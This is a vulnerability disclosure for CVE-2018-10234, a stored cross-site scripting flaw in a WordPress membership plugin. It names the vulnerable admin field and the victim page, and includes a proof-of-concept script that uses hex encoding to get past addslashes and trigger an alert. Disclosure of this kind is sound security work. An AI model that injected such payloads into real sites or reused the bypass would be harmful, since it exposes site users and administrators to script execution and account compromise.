CVE-2018-10234
[Suggested description]
Authenticated Cross site Scripting exists in the User Profile & Membership plugin before 2.0.11 for WordPress via the
"Account Deletion Custom Text"
input field on the wp-admin/admin.php?page=um_options§ion=account page.
[Additional Information]
In order to execute javascript payloads with strings you need to apply hex encoding because of addslashes like:
<script>
function hex2a(hexx) {
var str = 0;
for (index = 0, len = hexx.length; index < len; ++index) {
var hex = hexx[index].toString(16);
for (var i = 0; i < hex.length; i += 2)
str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
}
return str.slice(1);
}
var decode = [0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f]
var string = hex2a(decode);
alert(string);
</script>
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://ultimatemember.com/
[Affected Product Code Base]
User Profile & Membership plugin for WordPress - All versions < 2.0.11
[Affected Component]
User Profile & Membership plugin for WordPress
[Attack Type]
Local
[CVE Impact Other]
Stored Cross Site Scripting
[Attack Vectors]
Authenticated attackers could abuse the "Account Deletion Custom Text"
input field on the following page:
"http://<target/wp-admin/admin.php?page=um_options§ion=account"
to inject malicious javascript. Whenever a victim would visit the
page:
"http://<target/account/" to manage their account details the
malicious javascript will be executed against the Wordpress
users/administrators.
[Has vendor confirmed or acknowledged the vulnerability?]
true
[Discoverer]
Riccardo ten Cate
[Reference]
https://github.com/RiieCco/write-ups/tree/master/CVE-2018-10234